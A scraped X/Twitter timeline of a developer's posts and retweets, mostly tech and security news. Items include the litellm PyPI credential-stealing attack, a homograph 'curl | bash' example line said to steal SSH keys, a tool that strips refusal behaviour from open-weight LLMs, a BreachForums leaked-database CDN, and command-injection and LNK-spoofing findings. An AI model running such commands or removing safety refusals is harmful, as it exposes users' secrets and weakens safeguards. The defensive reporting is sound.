VBAnimal

1.7K posts

@VBAnimal

Dev... this account may thus behave strangely for testing ! #Python #PHP #JS #HTML #VBA

TheMoon · Joined October 2015
619 Following · 483 Followers
Felix Rieseberg (@felixrieseberg)
A small ship I love: We made Claude.ai and our desktop apps meaningfully faster this week. We moved our architecture from SSR to a static @vite_js & @tan_stack router setup that we can serve straight from workers at the edge. Time to first byte is down 65% at p75, prompts show up 50% sooner, navigation is snappier. We're not done (not even close!) but we care and we'll keep chipping away. Aiming to make Claude a little better every day.
VBAnimal retweeted
Google Research (@GoogleResearch)
Introducing TurboQuant: Our new compression algorithm that reduces LLM key-value cache memory by at least 6x and delivers up to 8x speedup, all with zero accuracy loss, redefining AI efficiency. Read the blog to learn how it achieves these results: goo.gle/4bsq2qI
VBAnimal retweeted
Andrej Karpathy (@karpathy)
Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any dependency you could be pulling in a poisoned package anywhere deep inside its entire dependency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.
Daniel Hnyk (@hnykda)

LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM pypi release 1.82.8. It has been compromised, it contains litellm_init.pth with base64 encoded instructions to send all the credentials it can find to remote server + self-replicate. link below

0xSero (@0xSero)
This is for all the frontend/fullstack devs, it'll make your life easier. Do you want GPT-5.4 & mini to make better UIs? No amount of prompting is going to fix the issue, the model simply is not good enough at frontend design on its own. I love it, just not for UI.
1. Go on ui.shadcn.com
2. Go through their UI builder
3. Click "Copy Command"
4. Run it
Voila, GPT now uses an expert crafted UI-component kit to build you any UI with perfect consistency. All free and open source btw.
VBAnimal retweeted
AprilNEA (@AprilNEA)
🧵 I just reverse-engineered the binaries inside Claude Code's Firecracker MicroVM and found something wild: Anthropic is building their own PaaS platform called "Antspace" (Ants + Space). It's a full deployment pipeline — hidden in plain sight inside the environment-runner binary. Here's what I found 👇
VBAnimal (@VBAnimal)
@blackroomsec The man is senior and does not know WSL?
BlackRoomSec (@blackroomsec)
Yeah, the org dodged a bullet with this one. I know it's been really popular for the younger generations to think it's cool to go around spewing their personal opinions at work but Corporate America has not changed in any way just because you happen to be alive. No one wants to hear your opinion, unless they ask for it. Which means you absolutely should not give it unless you are asked.🙄 And, if you are being given a standard issue laptop and aren't in any way responsible for the decisions that go behind purchasing those laptops then that's a good bet that nobody at work cares about your opinion because it doesn't matter and you're not that important in that particular org's food chain. And that's really the crux of it right? People like this thinking that they are more important than everybody else. That the rules don't apply to them. The IT staff isn't lazy. HR is not there to serve you but the company. Check your attitude and arrogance at the door. I would especially not be giving anyone an attitude in today's job climate because that's just insane. You're lucky you even GOT a job offer, let alone an actual job. READ THE ROOM, KID, SIT ALL THE WAY DOWN AND SHUT ALL THE WAY UP. As far as Windows is concerned it holds over 95% of the market share of all computers on Earth. 10 times out of 10 the computers are going to be Windows whether you personally agree with that or not. No one is going to change to Linux or a Mac for you. Macs are also very expensive computers and the org isn't going to buy 5,000 of them because of that. It's a budgetary decision and a sane one. Try to be a little self aware and ask yourself why all of these organizations aren't putting Macs on every desk and maybe consider that a lot of other people smarter than you, older than you and who have been working longer than you, have run the numbers and realized it just doesn't pay in the long run. That doesn't mean that the Mac is a bad computer. It isn't. It's a great computer. But it's really expensive. It would be really great if every organization I ever worked for would serve me lobster every day but the reality is they're not going to do that because it's an expensive lunch. And even at the highest levels I got a ham sandwich if I was lucky. The only reason that I was going out to expensive dinners every week with my boss in my last role is because he was personally paying for it. You're also supposed to be putting your best foot forward and not embarrassing yourself with your own ignorance. So in closing check yourself when you get a job and stop thinking that the world revolves around you because it doesn't.
Asmit (@coolcoder56)

Employee resigned because he got Windows 11 instead of Mac 💀

VBAnimal retweeted
chiefofautism (@chiefofautism)
someone built a tool that REMOVES censorship from ANY open-weight LLM with a single click 13 abliteration methods, 116 models, 837 tests, and it gets SMARTER every time someone runs it its called OBLITERATUS it finds the exact weights that make the model refuse and surgically removes them, full reasoning stays intact, just the refusal disappears 15 analysis modules map the geometry of refusal BEFORE touching a single weight, it can even fingerprint whether a model was aligned with DPO vs RLHF vs CAI just from subspace geometry alone then it cuts, the model keeps its full brain but loses the artificial compulsion to say no every time someone runs it with telemetry enabled their anonymous benchmark data feeds a growing community dataset, refusal geometries, method comparisons, hardware profiles at a scale no single lab could build
VBAnimal retweeted
Simone Margaritelli (@evilsocket)
State of security in Kali integrating AI ( kali.org/tools/mcp-kali… ): arguments are interpolated in a single command string, not escaped, so whatever the AI passes, including potential vectors for command injection, is executed. With pipes, &, ; and all that stuff like it's 1998. 🚀
VBAnimal retweeted
IntelOps (@IntelOpsV3)
The Breachforums CDN was just released We tested downloads with multiple files and large files and speeds are good However if you are a db collector, the downloads on offer are mostly the same old 2015 - 2023 official db from RaidForums and BreachForums. Hoping they add more exclusive and new db over time
VBAnimal (@VBAnimal)
@SeoClement Nextjs + Astro? I don't get it. Are there 2 apps?
Clément (@SeoClement)
It took me 8 hours to migrate my mom's broken-down WP site (with slow plugins, vulnerabilities, etc.) to Nextjs + Astro, programmatic-SEO style, and super fast.
VBAnimal (@VBAnimal)
@conar_app Ducon would work well ! :troll:
Conar.app (@conar_app)
And now let's get serious. Guys, we came up with the name randomly just so it would sound cool. Of course, we didn't check how it sounds in French. It was still a POC. Now thousands of people are using our app, but the name remains the same for many reasons. When we have the resources to change the name and buy a cool domain, we'll take care of it.
Conar.app (@conar_app)

We probably need to start transitioning to the new name...

VBAnimal retweeted
Wietze (@Wietze)
Can LNK files ever be trusted? ⚡ My latest blog post demonstrates several new LNK abuse methods, allowing you to fully spoof the target shown in Explorer. It also introduces tools to create your own LNKs, and detect spoofed ones yourself. 🐬 wietzebeukema.nl/blog/trust-me-…
VBAnimal (@VBAnimal)
@techNmak OAT looks broken on mobile. Guess I have my answer.
Tech with Mak (@techNmak)
Found a UI library that made me mass mass mass mass mass angry. Angry that this isn't how everything works. Oat: → 6KB CSS + 2.2KB JS → Zero dependencies → No framework required → No build step → Semantic HTML only You write
VBAnimal retweeted
Sheeki (@sheeki03)
Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith
VBAnimal (@VBAnimal)
@grok mention 30 accounts that look automated so they can read my post.
VBAnimal (@VBAnimal)
@grok Can you tag some account that looks automated under this so they read ?